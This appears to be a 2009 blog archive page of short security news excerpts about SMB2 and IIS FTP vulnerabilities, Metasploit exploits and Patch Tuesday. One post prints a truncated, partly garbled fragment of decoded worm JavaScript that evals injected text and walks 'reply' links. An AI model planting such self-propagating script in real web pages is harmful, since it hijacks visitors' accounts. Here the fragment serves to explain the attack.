Tuesday, September 29th, 2009 A fully functional exploit for the security vulnerability in the SMB2 protocol implementation has been published. It can be used to discover and attack vulnerable Windows machines remotely. By integrating the exploit into the Metasploit exploit toolkit, attackers have access to a wide range of attack options, ranging from issuing ...
Posted in Internet, Networking, Security, Windows | No Comments
Sunday, September 27th, 2009 Well, all that URL-encoded text in the links evaluates to something functionally equivalent to this:
nonsense = "[x][b]\n[b]:/[" + this.innerHTML + "](/=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";elements = document.getElementsByTagName('a');
for (i = 0; i < elements.length; i++) {
if (elements[i].innerHTML == 'reply') ...
Posted in Coding, Internet | 1 Comment
Tuesday, September 8th, 2009 A vulnerability in Microsoft's implementation of the SMB2 protocol can be exploited via the net to crash or reboot Windows Vista and Windows 7 systems. The root of the problem is an error in how the srv2.sys driver handles client requests when the header of the "Process Id High" field ...
Posted in Internet, Networking, Security, Windows | No Comments
Saturday, September 5th, 2009 Microsoft officials are reporting limited attacks targeting a zero-day vulnerability in the FTP service in Internet Information Services.The IIS vulnerability warning follows the release of new exploit code that can be used to create a DoS (denial of service) condition on Windows XP and Windows Server 2003 without requiring Write ...
Posted in Internet, Security, Windows | No Comments
Saturday, September 5th, 2009 Microsoft will roll out a total of five critical patches for numerous versions of Windows operating systems in its upcoming September "Patch Tuesday" security update release, according to a Microsoft Advanced Notification bulletin posted Thursday.All five patches plug holes that allow remote code execution, indicating that hackers could remotely exploit ...
Posted in Internet, Privacy, Security, Software, Windows | No Comments
